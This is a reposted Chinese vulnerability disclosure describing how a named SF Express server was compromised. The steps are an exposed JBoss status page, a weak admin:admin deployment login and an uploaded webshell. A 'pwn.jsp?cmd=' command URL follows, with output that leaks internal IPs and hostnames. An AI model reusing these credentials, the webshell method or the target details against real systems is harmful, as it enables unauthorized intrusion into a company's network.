顺丰速运某系统配置不当导致可获取系统权限 - 中国红客帝国官网-Honker EmPire For China - Powered by H.E.C
网络爱好者的栖息之地,让我们的网络技术更上一层楼!!!

顺丰速运某系统配置不当导致可获取系统权限

admin 漏洞预警

简要描述:

手动找的,弯弯绕绕,这里一点信息,那里一点信息,拼凑出了大问题,所以呢,一定要有耐心

详细说明:

域名:https://sfadp.sf-express.com

domain.jpg



#1 https://219.134.187.215

看到一个JBOSS的页面,但是jmx-console,web-console被删除了

但是呢 status (Tomcat status) 没删除,怪我咯?结果把后台又给暴漏了

1.jpg



#2 发现其他路径

2.jpg



#3 这里又是一个弱口令,进入部署后台 admin:admin

3.jpg

漏洞证明:

#4 上传一个部署包,系统权限就到手了

4.jpg





https://219.134.187.215/a/pwn.jsp?cmd=ipconfig%20/all

code 区域
Windows IP 配置



   主机名  . . . . . . . . . . . . . : sfa-DP

   主 DNS 后缀 . . . . . . . . . . . : 

   节点类型  . . . . . . . . . . . . : 混合

   IP 路由已启用 . . . . . . . . . . : 否

   WINS 代理已启用 . . . . . . . . . : 否



以太网适配器 本地连接:



   连接特定的 DNS 后缀 . . . . . . . : 

   描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection

   物理地址. . . . . . . . . . . . . : 00-50-56-89-2A-DA

   DHCP 已启用 . . . . . . . . . . . : 否

   自动配置已启用. . . . . . . . . . : 是

   本地链接 IPv6 地址. . . . . . . . : fe80::ec8b:8740:2a12:6796%11(首选) 

   IPv4 地址 . . . . . . . . . . . . : 10.0.80.101(首选) 

   子网掩码  . . . . . . . . . . . . : 255.255.255.0

   默认网关. . . . . . . . . . . . . : 10.0.80.254

   DHCPv6 IAID . . . . . . . . . . . : 234901590

   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-1A-CE-73-CF-00-50-56-89-2A-DA

   DNS 服务器  . . . . . . . . . . . : 10.0.15.2

   TCPIP 上的 NetBIOS  . . . . . . . : 已启用



隧道适配器 isatap.{5F1B9895-B9F6-40A9-8661-C8EAB76E20E2}:



   媒体状态  . . . . . . . . . . . . : 媒体已断开

   连接特定的 DNS 后缀 . . . . . . . : 

   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter

   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0

   DHCP 已启用 . . . . . . . . . . . : 否

   自动配置已启用. . . . . . . . . . : 是



隧道适配器 Teredo Tunneling Pseudo-Interface:



   连接特定的 DNS 后缀 . . . . . . . : 

   描述. . . . . . . . . . . . . . . : Microsoft Teredo Tunneling Adapter

   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0

   DHCP 已启用 . . . . . . . . . . . : 否

   自动配置已启用. . . . . . . . . . : 是

   IPv6 地址 . . . . . . . . . . . . : 2001:0:9d38:90d7:3077:c25:f5ff:af9a(首选) 

   本地链接 IPv6 地址. . . . . . . . : fe80::3077:c25:f5ff:af9a%18(首选) 

   默认网关. . . . . . . . . . . . . : ::

   TCPIP 上的 NetBIOS  . . . . . . . : 已禁用


code 区域
服务器名称            注解

-------------------------------------------------------------------------------

\\AIR-INTERFACE-2                                                              

\\AIR-SITA                                                                     

\\AIR-UMS-APP                                                                  

\\FOC-WEB                                                                      

\\SF-E6433414B3C1                                                              

\\SF-PNS                                                                       

\\SF-PNS-BAK                                                                   

\\SFA-DP                                                                       

\\WIN-DBTH3GQD9VH                                                              

\\WIN-EEQ3AURP80P                                                              

命令成功完成。
标签: 顺丰速运

免责声明:

本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的。不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,我们不保证内容的长久可用性,通过使用本站内容随之而来的风险与本站无关,您必须在下载后的24个小时之内,从您的电脑/手机中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。侵删请致信E-mail:22365412@qq.com

同类推荐
评论列表